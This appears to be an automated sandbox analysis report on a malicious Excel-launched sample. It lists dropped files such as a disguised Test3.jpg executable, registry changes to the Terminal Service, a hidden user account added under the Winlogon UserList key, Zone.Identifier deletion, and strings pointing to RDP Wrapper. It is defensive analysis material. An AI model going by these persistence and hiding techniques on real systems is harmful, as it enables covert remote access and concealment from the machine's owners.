Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Test1.txt	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Test1.txt			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Test3.jpg			Jump to dropped file

Source: C:\Windows\system32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete

Jump to behavior

Hides user accounts

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList .mFDHma

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
